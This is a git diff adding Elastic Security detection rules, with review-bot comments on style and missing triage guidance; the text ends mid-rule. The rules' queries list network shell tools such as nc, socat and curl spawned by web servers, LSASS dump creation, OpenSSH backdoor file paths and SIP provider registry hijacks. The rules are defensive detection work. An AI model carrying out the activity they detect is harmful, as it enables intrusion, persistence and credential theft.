If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate abnormal behaviors by the subject process such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential reverse shells or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - Investigate the process information for malicious or uncommon processes/process trees.\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n - Investigate the process tree spawned from the user that is used to run the web application service. 
A user that is running a web application should not spawn other child processes.\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info for Webapp User\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes WHERE uid = {{process.user.id}}\"}}\n- Examine the command line to determine which commands or scripts were executed.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\nevent.action in (\"exec\", \"exec_event\") and process.parent.executable : (\n \"/usr/sbin/nginx\", \"/usr/local/sbin/nginx\",\n \"/usr/sbin/apache\", \"/usr/local/sbin/apache\",\n \"/usr/sbin/apache2\", \"/usr/local/sbin/apache2\",\n \"/usr/sbin/php*\", \"/usr/local/sbin/php*\",\n \"/usr/sbin/lighttpd\", \"/usr/local/sbin/lighttpd\",\n \"/usr/sbin/hiawatha\", \"/usr/local/sbin/hiawatha\",\n \"/usr/local/bin/caddy\", \n \"/usr/local/lsws/bin/lswsctrl\",\n \"*/bin/catalina.sh\"\n) and\nprocess.name : (\n \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\",\n \"netcat\", \"ncat\", \"telnet\", \"awk\", \"socat\"\n ) and process.args : (\n \"whoami\", \"id\", \"uname\", \"cat\", \"hostname\", \"ip\", \"curl\", \"wget\", \"pwd\", \"ls\", \"cd\", \"python*\", \"php*\", \"perl\",\n \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\", \"socat\"\n ) and not process.name == \"phpquery\"\n", + "references": [ + "https://pentestlab.blog/tag/web-shell/", + "https://www.elastic.co/security-labs/elastic-response-to-the-the-spring4shell-vulnerability-cve-2022-22965" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": 
"process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "f16fca20-4d6c-43f9-aec1-20b6de3b0aeb", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Initial Access", + "Data Source: Elastic Endgame", + "Use Case: Vulnerability", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1505", + "name": "Server Software Component", + "reference": "https://attack.mitre.org/techniques/T1505/", + "subtechnique": [ + { + "id": "T1505.003", + "name": "Web Shell", + "reference": "https://attack.mitre.org/techniques/T1505/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1190", + "name": "Exploit Public-Facing Application", + "reference": "https://attack.mitre.org/techniques/T1190/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_7", + "type": "security-rule" +} \ No newline at end of file 
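Review bot: The `setup` text of f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_7.json links to a version-pinned page, `https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html`, while the other rules added in this commit (f0eb70e9_106 above, f24bcae1_108 below) point at `https://www.elastic.co/guide/en/fleet/current/agent-policy.html`; the pinned URL will go stale as Fleet moves on and should use the `current` form for consistency. The same pinned link appears in the f28e2be4_109 hunk further down. Separately, the `query` string carries a trailing space after `\"/usr/local/bin/caddy\", ` before the `\n`, which EQL tolerates but reads as an editing leftover worth normalising so the query diff stays clean across rule versions.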
diff --git a/packages/security_detection_engine/kibana/security_rule/f24bcae1-8980-4b30-b5dd-f851b055c9e7_108.json b/packages/security_detection_engine/kibana/security_rule/f24bcae1-8980-4b30-b5dd-f851b055c9e7_108.json new file mode 100644 index 00000000000..0965938c463 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f24bcae1-8980-4b30-b5dd-f851b055c9e7_108.json 
@@ -0,0 +1,115 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of osascript to create a hidden login item. This may indicate an attempt to persist a malicious program while concealing its presence.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Creation of Hidden Login Item via Apple Script", + "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and process.name : \"osascript\" and\n process.command_line : \"osascript*login item*hidden:true*\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f24bcae1-8980-4b30-b5dd-f851b055c9e7", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.002", + "name": "AppleScript", + "reference": "https://attack.mitre.org/techniques/T1059/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1647", + "name": "Plist File Modification", + "reference": "https://attack.mitre.org/techniques/T1647/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": 
"f24bcae1-8980-4b30-b5dd-f851b055c9e7_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_109.json b/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_109.json new file mode 100644 index 00000000000..deb702bb3f8 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_109.json 
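Review bot: f24bcae1-8980-4b30-b5dd-f851b055c9e7_108.json ships with no `note` investigation guide and no `false_positives` entry, so an analyst triaging a hit on `osascript*login item*hidden:true*` has only the one-line description to work from, whereas the f16fca20_7 and f2f46686_108 rules in this same commit carry full triage and remediation sections and the matching `Resources: Investigation Guide` tag. A short entry such as `"false_positives": ["Legitimate installers that register a hidden login item via AppleScript during setup."]` plus a `note` covering which parent process spawned osascript and which login item path was registered would bring it in line with the rest of the package.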
@@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a Secure Shell (SSH) client or server process creating or writing to a known SSH backdoor log file. Adversaries may modify SSH related binaries for persistence or credential access via patching sensitive functions to enable unauthorized access or to log SSH credentials for exfiltration.", + "false_positives": [ + "Updates to approved and trusted SSH executables can trigger this rule." + ], + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential OpenSSH Backdoor Logging Activity", + "query": "file where host.os.type == \"linux\" and event.type == \"change\" and process.executable : (\"/usr/sbin/sshd\", \"/usr/bin/ssh\") and\n (\n (file.name : (\".*\", \"~*\", \"*~\") and not file.name : (\".cache\", \".viminfo\", \".bash_history\", \".google_authenticator\",\n \".jelenv\", \".csvignore\", \".rtreport\")) or\n file.extension : (\"in\", \"out\", \"ini\", \"h\", \"gz\", \"so\", \"sock\", \"sync\", \"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\") or\n file.path :\n (\n \"/private/etc/*--\",\n \"/usr/share/*\",\n \"/usr/include/*\",\n \"/usr/local/include/*\",\n \"/private/tmp/*\",\n \"/private/var/tmp/*\",\n \"/usr/tmp/*\",\n \"/usr/share/man/*\",\n \"/usr/local/share/*\",\n \"/usr/lib/*.so.*\",\n \"/private/etc/ssh/.sshd_auth\",\n \"/usr/bin/ssd\",\n \"/private/var/opt/power\",\n \"/private/etc/ssh/ssh_known_hosts\",\n \"/private/var/html/lol\",\n \"/private/var/log/utmp\",\n \"/private/var/lib\",\n \"/var/run/sshd/sshd.pid\",\n \"/var/run/nscd/ns.pid\",\n \"/var/run/udev/ud.pid\",\n \"/var/run/udevd.pid\"\n )\n )\n", + "references": [ + "https://github.com/eset/malware-ioc/tree/master/sshdoor", + "https://www.welivesecurity.com/wp-content/uploads/2021/01/ESET_Kobalos.pdf" + ], + "related_integrations": [ + { + "package": "endpoint", + 
"version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "f28e2be4-6eca-4349-bdd9-381573730c22", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. 
[Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1556", + "name": "Modify Authentication Process", + "reference": "https://attack.mitre.org/techniques/T1556/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1554", + "name": "Compromise Client Software Binary", + "reference": "https://attack.mitre.org/techniques/T1554/" + } + ] + } + ], + 
"timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "f28e2be4-6eca-4349-bdd9-381573730c22_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f2c7b914-eda3-40c2-96ac-d23ef91776ca_106.json b/packages/security_detection_engine/kibana/security_rule/f2c7b914-eda3-40c2-96ac-d23ef91776ca_106.json new file mode 100644 index 00000000000..4c4a818d1be --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f2c7b914-eda3-40c2-96ac-d23ef91776ca_106.json 
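Review bot: The `file.path` list in f28e2be4-6eca-4349-bdd9-381573730c22_109.json mixes macOS-style `/private/etc/*--`, `/private/tmp/*`, `/private/var/tmp/*` and `/private/etc/ssh/.sshd_auth` entries into a query scoped to `host.os.type == \"linux\"` and tagged `OS: Linux`; `/private` is not a standard directory on Linux, so those entries look like dead weight unless the rule was meant to cover macOS as well, and either dropping them or widening the OS scope (and saying which in the description) would make the intent clear. The description also states the rule catches a process "creating or writing to" a backdoor log file, yet the query only matches `event.type == \"change\"`; if the data source reports new files under a distinct creation event type, creation would be missed, so this is worth confirming against Elastic Defend and Auditbeat file events. The `setup` text here also uses the version-pinned `fleet/8.10/agent-policy.html` link rather than the `current` form used by the neighbouring rules.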
@@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies modifications to the registered Subject Interface Package (SIP) providers. SIP providers are used by the Windows cryptographic system to validate file signatures on the system. This may be an attempt to bypass signature validation checks or inject code into critical processes.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "SIP Provider Modification", + "query": "registry where host.os.type == \"windows\" and event.type:\"change\" and\n registry.path: (\n \"*\\\\SOFTWARE\\\\Microsoft\\\\Cryptography\\\\OID\\\\EncodingType 0\\\\CryptSIPDllPutSignedDataMsg\\\\{*}\\\\Dll\",\n \"*\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Cryptography\\\\OID\\\\EncodingType 0\\\\CryptSIPDllPutSignedDataMsg\\\\{*}\\\\Dll\",\n \"*\\\\SOFTWARE\\\\Microsoft\\\\Cryptography\\\\Providers\\\\Trust\\\\FinalPolicy\\\\{*}\\\\$Dll\",\n \"*\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Cryptography\\\\Providers\\\\Trust\\\\FinalPolicy\\\\{*}\\\\$Dll\"\n ) and\n registry.data.strings:\"*.dll\"\n", + "references": [ + "https://github.com/mattifestation/PoCSubjectInterfacePackage" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f2c7b914-eda3-40c2-96ac-d23ef91776ca", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: 
Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1553", + "name": "Subvert Trust Controls", + "reference": "https://attack.mitre.org/techniques/T1553/", + "subtechnique": [ + { + "id": "T1553.003", + "name": "SIP and Trust Provider Hijacking", + "reference": "https://attack.mitre.org/techniques/T1553/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 106 + }, + "id": "f2c7b914-eda3-40c2-96ac-d23ef91776ca_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f2c7b914-eda3-40c2-96ac-d23ef91776ca_107.json b/packages/security_detection_engine/kibana/security_rule/f2c7b914-eda3-40c2-96ac-d23ef91776ca_107.json new file mode 100644 index 00000000000..eddf94144e6 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f2c7b914-eda3-40c2-96ac-d23ef91776ca_107.json 
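Review bot: f2c7b914-eda3-40c2-96ac-d23ef91776ca_106.json has no `false_positives` entry and no `note` section, although the `registry.path` values it watches (`CryptSIPDllPutSignedDataMsg\{GUID}\Dll` and `Providers\Trust\FinalPolicy\{GUID}\$Dll`) are the same keys any software that registers its own Subject Interface Package writes during installation, so analysts will see hits with no triage guidance. Consider adding `"false_positives": ["Legitimate installation of software that registers its own Subject Interface Package, such as code-signing or document-signing tools."]` and a short `note` describing how to check the signature, publisher and on-disk location of the DLL named in `registry.data.strings`. The same gap applies to the _107 file in the next hunk, which differs only in narrowing `index` to `logs-endpoint.events.registry-*`.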
@@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies modifications to the registered Subject Interface Package (SIP) providers. SIP providers are used by the Windows cryptographic system to validate file signatures on the system. This may be an attempt to bypass signature validation checks or inject code into critical processes.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "SIP Provider Modification", + "query": "registry where host.os.type == \"windows\" and event.type:\"change\" and\n registry.path: (\n \"*\\\\SOFTWARE\\\\Microsoft\\\\Cryptography\\\\OID\\\\EncodingType 0\\\\CryptSIPDllPutSignedDataMsg\\\\{*}\\\\Dll\",\n \"*\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Cryptography\\\\OID\\\\EncodingType 0\\\\CryptSIPDllPutSignedDataMsg\\\\{*}\\\\Dll\",\n \"*\\\\SOFTWARE\\\\Microsoft\\\\Cryptography\\\\Providers\\\\Trust\\\\FinalPolicy\\\\{*}\\\\$Dll\",\n \"*\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Cryptography\\\\Providers\\\\Trust\\\\FinalPolicy\\\\{*}\\\\$Dll\"\n ) and\n registry.data.strings:\"*.dll\"\n", + "references": [ + "https://github.com/mattifestation/PoCSubjectInterfacePackage" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f2c7b914-eda3-40c2-96ac-d23ef91776ca", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data 
Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1553", + "name": "Subvert Trust Controls", + "reference": "https://attack.mitre.org/techniques/T1553/", + "subtechnique": [ + { + "id": "T1553.003", + "name": "SIP and Trust Provider Hijacking", + "reference": "https://attack.mitre.org/techniques/T1553/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "f2c7b914-eda3-40c2-96ac-d23ef91776ca_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_108.json b/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_108.json new file mode 100644 index 00000000000..9ec7370deb7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_108.json 
@@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of a Local Security Authority Subsystem Service (lsass.exe) default memory dump. This may indicate a credential access attempt via trusted system utilities such as Task Manager (taskmgr.exe) and SQL Dumper (sqldumper.exe) or known pentesting tools such as Dumpert and AndrewSpecial.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "LSASS Memory Dump Creation", + "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Creation\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nThis rule looks for the creation of memory dump files with file names compatible with credential dumping tools or that start with `lsass`.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process responsible for creating the dump file.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with 